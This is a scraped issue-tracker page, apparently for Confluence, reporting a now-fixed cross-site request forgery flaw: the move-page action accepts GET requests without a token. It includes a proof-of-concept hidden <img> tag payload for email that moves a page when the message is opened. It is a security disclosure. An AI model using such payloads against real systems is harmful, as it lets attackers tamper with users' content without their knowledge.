-
Bug
-
Resolution: Fixed
-
Medium
-
5.2, 5.3
-
None
-
5
-
Seems like you can easily move pages around spaces by just hitting the movepage action using GET, like this:
http://localhost:8080/confluence/pages/movepage.action?pageId=787055&position=topLevel&spaceKey=S2
Malicious example of how to exploit this (in an email message):
<img src="http://localhost:8080/confluence/pages/movepage.action?pageId=787055&position=topLevel&spaceKey=S2" style="height:0;width:0">
(after opening the email, the page has been moved to S2 space)
scary!!
- mentioned in
-
Page Failed to load
| Form Name | |||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|
Moving pages around spaces using HTTP get without XSRF token
-
-
Resolution: Fixed
-
Medium
-
5.2, 5.3
-
None
-
5
-
Seems like you can easily move pages around spaces by just hitting the movepage action using GET, like this:
http://localhost:8080/confluence/pages/movepage.action?pageId=787055&position=topLevel&spaceKey=S2
Malicious example of how to exploit this (in an email message):
<img src="http://localhost:8080/confluence/pages/movepage.action?pageId=787055&position=topLevel&spaceKey=S2" style="height:0;width:0">
(after opening the email, the page has been moved to S2 space)
scary!!
- mentioned in
-
Page Loading...
-
PatrickA
-
- Affected customers:
-
0 This affects my team
- Watchers:
-
6 Start watching this issue
- Created:
- Updated:
- Resolved: